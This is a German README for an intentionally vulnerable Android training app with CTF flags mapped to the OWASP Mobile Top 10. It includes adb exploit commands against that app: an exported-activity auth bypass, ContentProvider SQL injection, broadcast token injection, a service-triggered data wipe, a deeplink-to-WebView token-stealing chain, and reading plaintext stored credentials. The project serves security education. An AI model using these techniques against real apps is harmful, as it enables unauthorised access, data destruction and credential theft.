
Absichtlich verwundbare Android-App für Mobile-Security-Forschung und Bug-Bounty-Praxis - OWASP Mobile Top 10
Eine bewusst verwundbare Android-Anwendung für Mobile-Security-Forschung, Bug-Bounty-Praxis und CTF-orientiertes Lernen. Enthält 21 dokumentierte Schwachstellen, zugeordnet zu den OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Starte die App, arbeite jedes Lab durch, sammle Flags und reiche sie im In-App-CTF-Scoreboard ein.
| Kategorie | Schwachstellen | Flags |
|---|---|---|
| WebView | WV-01 bis WV-05 | 5 |
| Deeplink | DL-01 bis DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 bis AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 bis BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
Insgesamt 20 Flags, plus eine Master-Flag, die für das Erfassen aller Flags vergeben wird.
| Lab-Liste | CTF-Scoreboard |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
Dieses Projekt dient ausschließlich Bildungszwecken. Alle Schwachstellen sind beabsichtigt und dokumentiert. Die hier gezeigten Techniken lassen sich auf echte Apps anwenden, aber teste nur Systeme, die dir gehören oder für die du eine Testautorisierung hast. Siehe SECURITY.md für den vollständigen Haftungsausschluss und Hinweise zur verantwortungsvollen Offenlegung.
MIT – siehe LICENSE.